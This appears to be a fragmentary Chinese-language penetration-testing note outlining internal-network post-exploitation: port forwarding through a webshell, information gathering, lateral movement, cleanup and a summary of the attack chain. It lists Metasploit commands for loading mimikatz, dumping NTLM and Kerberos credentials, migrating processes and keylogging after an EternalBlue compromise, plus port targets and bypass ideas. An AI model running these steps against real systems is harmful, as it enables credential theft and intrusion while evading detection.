1. 内网转发
2. 信息收集
3. 横向移动
4. 收尾工程
5. 总结

内网转发

拿到webshell进行端口转发，达到代理的目的



监听状态


连接之后可以进行操作，比如查看ip
获取用户名什么的

功能比较强大

信息收集

进入服务器后进行信息收集


msf读取本机密码


以上演示是针对永恒之蓝漏洞-win7x64版本的，由于机主是win10之后的暂不演示，命令如下
返回后
load mimikatz
msv
kerberos
ps进入
migrate ####
migrate ####
keyscan start
keyscan dump
keyscan dump

横向移动

端口扫描：8080,3389-远程登录,701,445,1433-msfsql
御剑其实更快扫描端口
命令执行：java反序列化漏洞
mysql-权限
文件上传-进行绕过

收尾工程

还有一些工具可以用于清理

总结

拿到权限绕过防火墙-进行端口转发或者进行代理-socks多层代理-信息收集-拿到各种密码-进行端口扫描要针对型扫描，针对某个端口（因为扫描的时候会造成很大的动静）-得到漏洞